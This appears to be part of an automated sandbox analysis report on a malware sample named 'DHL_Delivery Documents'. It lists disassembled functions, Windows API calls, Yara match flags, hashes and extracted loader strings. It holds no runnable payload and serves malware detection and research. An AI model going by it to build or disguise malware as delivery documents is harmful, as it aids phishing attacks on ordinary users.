                        • Opcode ID: c48f26505a8d130d4680f3f603ec773ca74c68ba0a9985fa81b5596f6b054f2c
                        • Instruction ID: f301fa57d9230aa7364bfc6ead184c31376d1472fdfcbb512c384ba426524294
                        • Opcode Fuzzy Hash: c48f26505a8d130d4680f3f603ec773ca74c68ba0a9985fa81b5596f6b054f2c
                        • Instruction Fuzzy Hash: D121E2B5D00249AFDB10CFAAD984ADEBBF8FB48310F14801AE919A3310D374A944DFA1

                        Control-flow Graph (function at 2c1a188; rendered graph not recoverable)
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C1B099,00000800,00000000,00000000), ref: 02C1B2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 66a47ae8b75a45fcf6485dd0da63e29870c1478e30214994efaa45a2468708c0
                        • Instruction ID: 85f2478206e77c987ea3d6848d989bf12c9862748028b258172b44b56da04c6a
                        • Opcode Fuzzy Hash: 66a47ae8b75a45fcf6485dd0da63e29870c1478e30214994efaa45a2468708c0
                        • Instruction Fuzzy Hash: 8B1112B6D003099FCB14CF9AD448A9EFBF4EB89314F10842AE519A7700C379A949CFA5

                        Control-flow Graph (function at 2c1b238; rendered graph not recoverable)
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C1B099,00000800,00000000,00000000), ref: 02C1B2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 9e8ec3ea68fed14048ac0b2bf17451f8407af4faaaf70de496a76e272362b243
                        • Instruction ID: 8ae63b6a6f6c8889287a21fadc40ee7cad72df0bdf068069ad80721085dc7cd3
                        • Opcode Fuzzy Hash: 9e8ec3ea68fed14048ac0b2bf17451f8407af4faaaf70de496a76e272362b243
                        • Instruction Fuzzy Hash: 741126B6D003498FCB14CFAAD449ADEFBF4EB89314F11842AD519A7200C375A946CFA5

                        Control-flow Graph (function at 2c1afb8; rendered graph not recoverable)
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C1B01E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: eeb61f6094757f1100760257aeea4a70e5993596e16fddd35cbc9c92100bcecb
                        • Instruction ID: 1fc7213cbc3ff74e77d6f42935e569da149a4bdab5d241b5c33cbc7e7b03dc92
                        • Opcode Fuzzy Hash: eeb61f6094757f1100760257aeea4a70e5993596e16fddd35cbc9c92100bcecb
                        • Instruction Fuzzy Hash: 40110FB5C002498FCB10CF9AD448A9EFBF4AB88218F10846AD429A7210D375A945CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079370264.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false

                        Execution Graph

                        Execution Coverage:1.1%
                        Dynamic/Decrypted Code Coverage:4%
                        Signature Coverage:6.3%
                        Total number of Nodes:174
                        Total number of Limit Nodes:18

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 43 42b543-42b57f call 404933 call 42c5e3 NtClose
                        APIs
                        • NtClose.NTDLL(004243C0,?,00000000,^gA,?,004243C0,^gA,0000008F,?,?,?,?,?,?,?,00427AC9), ref: 0042B57A
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: ^gA
                        • API String ID: 3535843008-2986628814
                        • Opcode ID: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction ID: 03411ecb8d4fa88b11b9b1f6be6a87388c1a926cff93cb39c7ed998421602738
                        • Opcode Fuzzy Hash: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction Fuzzy Hash: 48E04F752406147BD620AB6ADC42F9B775CDFC5711F404059FA08A7141D671B90187B4

                        Control-flow Graph

                        control_flow_graph 73 4179a3-4179bf 74 4179c7-4179cc 73->74 75 4179c2 call 42e113 73->75 76 4179d2-4179e0 call 42e633 74->76 77 4179ce-4179d1 74->77 75->74 80 4179f0-417a01 call 42cad3 76->80 81 4179e2-4179ed call 42e8d3 76->81 86 417a03-417a17 LdrLoadDll 80->86 87 417a1a-417a1d 80->87 81->80 86->87
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A15
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction ID: 246b37b595cb1f8abe4634870689f303e8f754b1e926b61588038419cb0b2c3f
                        • Opcode Fuzzy Hash: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction Fuzzy Hash: BA0171B1E4020DABEF10DBE5DC42FDEB7B89B54304F0081AAE90897241F635EB588B95

                        Control-flow Graph

                        control_flow_graph 102 1c52b60-1c52b6c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 509e50eeb20fd065feee69515e970b0e71d23a21dba16b599f4d468a5976e607
                        • Instruction ID: c6e48b6776d5f16463917372d1fd39809c3ed2a74ee9391c148138f369d0456f
                        • Opcode Fuzzy Hash: 509e50eeb20fd065feee69515e970b0e71d23a21dba16b599f4d468a5976e607
                        • Instruction Fuzzy Hash: CA9002E12025004341057158445561A400E97E0601B55C021E5014590EC525C9916225

                        Control-flow Graph

                        control_flow_graph 104 1c52df0-1c52dfc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f025c5fc1d4484864a32e4535f36051bd5f9ab59e6bcfdc84164a8eb4a206444
                        • Instruction ID: c2be082ad1c0980bb3d4dac169d5ad1b7eee878b5092eac2b1f75f97aa4eaf46
                        • Opcode Fuzzy Hash: f025c5fc1d4484864a32e4535f36051bd5f9ab59e6bcfdc84164a8eb4a206444
                        • Instruction Fuzzy Hash: 349002B120150453D1117158454570B000D97D0641F95C412A4424558ED656CA52A221

                        Control-flow Graph

                        control_flow_graph 103 1c52c70-1c52c7c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 70a6ac943d3dc413c5734b081e822a649eadbea6b23c520a1ec529805fae5c77
                        • Instruction ID: 81f79c0dc8f027fb834008a01c269a9fe55f173f9e6e019b28b582347e5cdf9b
                        • Opcode Fuzzy Hash: 70a6ac943d3dc413c5734b081e822a649eadbea6b23c520a1ec529805fae5c77
                        • Instruction Fuzzy Hash: 329002B120158842D1107158844574E000997D0701F59C411A8424658EC695C9917221
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 42d000c357d900331b9c06979ac9d7375bb147b2d6d039bfa1fafba772e122c6
                        • Instruction ID: caff9a2da152ccbd3e620002e54a69bd2e80a8a2d658815fe2d3a7fe00e7d786
                        • Opcode Fuzzy Hash: 42d000c357d900331b9c06979ac9d7375bb147b2d6d039bfa1fafba772e122c6
                        • Instruction Fuzzy Hash: 689002B160560442D1007158455570A100997D0601F65C411A4424568EC795CA5166A2

                        Control-flow Graph

                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00414060
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: 58d8be79e16e3dc60e96aa8b4312756853e7c9e4fcf57e36218cd9b2329fe717
                        • Instruction ID: cc828ff01026f90f1c64f201f30b97ea4b1239e64b2ab6d0f48480ce2f890cc2
                        • Opcode Fuzzy Hash: 58d8be79e16e3dc60e96aa8b4312756853e7c9e4fcf57e36218cd9b2329fe717
                        • Instruction Fuzzy Hash: 21110871E4125876EB21ABD2DC02FDE7B7C8F41754F40812AFA047B280D6BC560687E9

                        Control-flow Graph

                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00414060
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: bd4e12aaaf9162ff1fb2c4a3bfe9cfbe65051a9948c3cdfd28bd0b9096c44847
                        • Instruction ID: 651202df5359c4b1c478fb6e16e8d4064c1d4a35b1e84aa34120ae049efa0491
                        • Opcode Fuzzy Hash: bd4e12aaaf9162ff1fb2c4a3bfe9cfbe65051a9948c3cdfd28bd0b9096c44847
                        • Instruction Fuzzy Hash: 3801C871E4125876EB21ABD29C02FDE7B7C9F40754F044156FA047B181D6BC560587A9

                        Control-flow Graph

                        control_flow_graph 38 42b8a3-42b8e4 call 404933 call 42c5e3 RtlFreeHeap
                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B8DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: ^gA
                        • API String ID: 3298025750-2986628814
                        • Opcode ID: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction ID: d1b7cdcc687be7268f1dab5434fc267ee9aa6777f2573276c05546cdb62020f5
                        • Opcode Fuzzy Hash: 5b5779b60b6029d5b904e4ea3c71d230503f93d838177fd9535817038665164d
                        • Instruction Fuzzy Hash: 59E06DB1204214BBD624EE69DC41E9B33ACEFC9710F400019FA08A7241D670B911CBB8

                        Control-flow Graph

                        control_flow_graph 88 42b853-42b894 call 404933 call 42c5e3 RtlAllocateHeap
                        APIs
                        • RtlAllocateHeap.NTDLL(?,0041E1D8,?,?,00000000,?,0041E1D8,?,?,?), ref: 0042B88F
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction ID: 43464d4c100cc5653048c36a615d0a47c54632ee96d3129ed3818db9d3e94e43
                        • Opcode Fuzzy Hash: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction Fuzzy Hash: C5E06DB5204214BBC614EE59DC46EDB33ACEFC9714F004419FA08A7241C670B91186B8

                        Control-flow Graph

                        control_flow_graph 93 42b8f3-42b92c call 404933 call 42c5e3 ExitProcess
                        APIs
                        • ExitProcess.KERNEL32(?,00000000,?,?,F978D589,?,?,F978D589), ref: 0042B927
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 89564e1482107890f717570798dc677ceb090b8adaeb1f9c35f06bafd03b1667
                        • Instruction ID: b04e60342bc957c43722cce74b24b471a7b82de60c1e0470105fae74616f7203
                        • Opcode Fuzzy Hash: 89564e1482107890f717570798dc677ceb090b8adaeb1f9c35f06bafd03b1667
                        • Instruction Fuzzy Hash: 11E046722002147BC620AA6AEC41F9BB76DDFC6714F40402AFA08A7282C6B5B910C7E5

                        Control-flow Graph

                        control_flow_graph 98 1c52c0a-1c52c0f 99 1c52c11-1c52c18 98->99 100 1c52c1f-1c52c26 LdrInitializeThunk 98->100
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 11151636ada2e1b7bfbdca6ff80f0898ca153c9ac9311a7f920fd4ed7b53b3dc
                        • Instruction ID: 27c7eb74f51045640fa19fcd77c3200ccc742d65db20024dec120263e8773251
                        • Opcode Fuzzy Hash: 11151636ada2e1b7bfbdca6ff80f0898ca153c9ac9311a7f920fd4ed7b53b3dc
                        • Instruction Fuzzy Hash: CFB09BB19015C5C5EB51E764460971B794477D0701F15C061D6030641F4738D1D1E275
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-2160512332
                        • Opcode ID: dcc9fbec873fe03ea2171123ca45b2df5918d09e59aaa1c9eb1e9c70b81863c7
                        • Instruction ID: 1307dd35ae7d06e69f91f2d08caf2bf693f4436fa6b624d34be74c4a70a49ece
                        • Opcode Fuzzy Hash: dcc9fbec873fe03ea2171123ca45b2df5918d09e59aaa1c9eb1e9c70b81863c7
                        • Instruction Fuzzy Hash: BB92AF71608382EFEB21CF29C888B6BB7E8BB84754F04491DFA95D7250D774E944CB92
                        Strings
                        • Critical section address., xrefs: 01C85502
                        • Invalid debug info address of this critical section, xrefs: 01C854B6
                        • Critical section debug info address, xrefs: 01C8541F, 01C8552E
                        • 8, xrefs: 01C852E3
                        • Critical section address, xrefs: 01C85425, 01C854BC, 01C85534
                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C8540A, 01C85496, 01C85519
                        • undeleted critical section in freed memory, xrefs: 01C8542B
                        • double initialized or corrupted critical section, xrefs: 01C85508
                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C854E2
                        • Thread identifier, xrefs: 01C8553A
                        • corrupted critical section, xrefs: 01C854C2
                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C854CE
                        • Address of the debug info found in the active list., xrefs: 01C854AE, 01C854FA
                        • Thread is in a state in which it cannot own a critical section, xrefs: 01C85543
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                        • API String ID: 0-2368682639
                        • Opcode ID: 9cadef2173d3b13e28de97b0910c14d08c51c91a5f1373889d95f0ef18d1ae01
                        • Instruction ID: 15f0f1dcdd2322242aefa5c6c3d8650fc4c0471583ac92975277e8abe20d4009
                        • Opcode Fuzzy Hash: 9cadef2173d3b13e28de97b0910c14d08c51c91a5f1373889d95f0ef18d1ae01
                        • Instruction Fuzzy Hash: 69818DB1A40348EFDB25CF9AC885BAEBBB5EB08B14F10415DF604B7650D3B1E944CB60
                        Strings
                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01C822E4
                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01C82506
                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01C824C0
                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01C825EB
                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 01C8261F
                        • @, xrefs: 01C8259B
                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01C82602
                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01C82409
                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01C82624
                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01C82412
                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01C82498
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                        • API String ID: 0-4009184096
                        • Opcode ID: 4d72082c4eea8493c8c2be7de2756e395ed6b5892931f22dcc9253bfb82e764c
                        • Instruction ID: d2976ae5ea7945bcb7e6211a82c1486e8fd241199c9f543f2bb48a97a20b6c95
                        • Opcode Fuzzy Hash: 4d72082c4eea8493c8c2be7de2756e395ed6b5892931f22dcc9253bfb82e764c
                        • Instruction Fuzzy Hash: C9028FF1D04229DBEB31DB58CC85B9AB7B8AF54304F0041EAA609A7241DB70DF84CF69
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                        • API String ID: 0-2515994595
                        • Opcode ID: a7a60d59c385a7a57994bb4e63bb15071aa129da7a7281ac219562dbb48c43ea
                        • Instruction ID: 840ca0990544a35c919273bb61a5558b2b84dafc971528d333470a3425afe386
                        • Opcode Fuzzy Hash: a7a60d59c385a7a57994bb4e63bb15071aa129da7a7281ac219562dbb48c43ea
                        • Instruction Fuzzy Hash: 18519DB1504306DBD729DF298888BEBBBECAF94650F144A1EA959C3240E770D644CBD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                        • API String ID: 0-1700792311
                        • Opcode ID: 60d92946d7160c81c46a62d8a2dd5883262c25bf7aff8a6d2f8b96862ee4567d
                        • Instruction ID: 3a568de00c61d2ad4178042dfb6532dc023ff522922043ff286cf3d375438310
                        • Opcode Fuzzy Hash: 60d92946d7160c81c46a62d8a2dd5883262c25bf7aff8a6d2f8b96862ee4567d
                        • Instruction Fuzzy Hash: D7D1CB39600686EFDB26DFA9C440AAAFBF1FF59A04F08805DE5459B252C734DEA0CB54
                        Strings
                        • VerifierDlls, xrefs: 01C98CBD
                        • AVRF: -*- final list of providers -*- , xrefs: 01C98B8F
                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01C98A67
                        • VerifierDebug, xrefs: 01C98CA5
                        • HandleTraces, xrefs: 01C98C8F
                        • VerifierFlags, xrefs: 01C98C50
                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01C98A3D
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                        • API String ID: 0-3223716464
                        • Opcode ID: a36e16c81a097499d1b36da0bc3ab9502ad2d2693b25d706c6bda9d3db5e1e8f
                        • Instruction ID: f35062ca8e6e484506769f22ecd400f137e22d79e05a552fd97fe2e3f0f19dc1
                        • Opcode Fuzzy Hash: a36e16c81a097499d1b36da0bc3ab9502ad2d2693b25d706c6bda9d3db5e1e8f
                        • Instruction Fuzzy Hash: 4591347264535AEFDB22EF299888B1B77A4AF56B14F04045CFA40AB391C730ED54CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                        • API String ID: 0-1109411897
                        • Opcode ID: b746aa7c885d1fe57790a29d4dc267bbbb4f79dce8f03e2a978a31d5e45688aa
                        • Instruction ID: 9d6b1a5c746de34a02e6f2a57a4d978d9c9f3d6a7929f2fd2688f1672413646c
                        • Opcode Fuzzy Hash: b746aa7c885d1fe57790a29d4dc267bbbb4f79dce8f03e2a978a31d5e45688aa
                        • Instruction Fuzzy Hash: EBA26870A0562ACFDB69CF19CC98BA9BBB5AF46304F1442E9D80DA7254DB70DE85DF00
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-792281065
                        • Opcode ID: 4880793a055b9b365a0434babbc651092f12e1daed82a0dea47701922e37c913
                        • Instruction ID: c8bb1a6e89dc5f73e72b5722ff4be2dfc3e27d01aec9672d531b446e1591a70d
                        • Opcode Fuzzy Hash: 4880793a055b9b365a0434babbc651092f12e1daed82a0dea47701922e37c913
                        • Instruction Fuzzy Hash: 52917E30B04326DBEF3AEF59D889BAA7BA1BF51B28F00015DE90167385D774D941D790
                        Strings
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C69A11, 01C69A3A
                        • apphelp.dll, xrefs: 01C06496
                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01C69A2A
                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01C699ED
                        • LdrpInitShimEngine, xrefs: 01C699F4, 01C69A07, 01C69A30
                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01C69A01
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-204845295
                        • Opcode ID: 78f2e7707561b2a815ec5b4a4759f45f1de627c63a3e3536f87db16ef197904e
                        • Instruction ID: e432de37824f5da386a26ca671dedf71364dfba06ffb0ef60a279ddd8c779de2
                        • Opcode Fuzzy Hash: 78f2e7707561b2a815ec5b4a4759f45f1de627c63a3e3536f87db16ef197904e
                        • Instruction Fuzzy Hash: 2B51E171208300EFD726DF24C882BAB77E8FF84648F00091DF586972A1D730EA54DB92
                        Strings
                        • minkernel\ntdll\ldrredirect.c, xrefs: 01C88181, 01C881F5
                        • LdrpInitializeImportRedirection, xrefs: 01C88177, 01C881EB
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C4C6C3
                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01C881E5
                        • LdrpInitializeProcess, xrefs: 01C4C6C4
